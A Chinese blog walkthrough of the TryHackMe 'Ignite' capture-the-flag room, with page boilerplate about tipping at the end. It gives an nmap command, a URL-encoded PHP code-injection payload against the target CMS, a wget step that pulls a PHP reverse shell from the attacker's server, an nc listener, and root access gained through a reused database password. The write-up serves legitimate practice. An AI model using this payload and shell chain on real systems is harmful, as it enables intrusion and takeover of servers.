tryhackme--Ignite

tryhackme–Ignite

用nmap扫描

nmap -T4 -sS -sV 10.10.214.254 -sC

在这里插入图片描述
发现CMS及版本
在这里插入图片描述
搜索本地漏洞库,发现一个远程代码执行漏洞,不要问我为什么不选sql的,系统命令执行和数据库那个香自己掂量
在这里插入图片描述
查看脚本里面的payload用法
在这里插入图片描述
修改一下paylaod,执行查看源码

%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"id"%27%29%2b%27

'%2bpi(print(%24a%3d'system'))%2b%24a('id')%2b'  #url解码的payload,看的更直观

在这里插入图片描述
接下来就是要弹回一个shell,因为system函数的原因我们执行的命令不能有’,",;之类的符号,所以我们wget下载的方式下载一个shell,至于这个nc马,kali上有

python3 -m http.server  #攻击机
wget 10.9.xx.xx:8000/shell.php -O shell.php  #服务器执行的命令

在这里插入图片描述
在这里插入图片描述
马在根目录
在这里插入图片描述
设置监听访问nc马,得到一个shell

nc -lvp 4444

在这里插入图片描述
只有一个root登录用户,并在www-data用户上找到第一个flag
在这里插入图片描述
接下来进行紧张而又刺激的提权
sudo不行,suid不行,没定时任务,Linux内核太高,并且只有root用户,搞完这些,回过头去看网站数据库配置文件,用连接数据库的密码切换root,然后tmd成功了,好家伙,密码复用,亏我还研究了一波:NTFS 3g本地提权漏洞—【CVE-2017-0358】

上次有个靶机也是密码复用,我发誓拿到shell的第一件事就看数据库配置文件!!!!
在这里插入图片描述

在这里插入图片描述
好吧是我想太多
在这里插入图片描述

ps:

个人站点博客:XingHe,欢迎来踩~

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值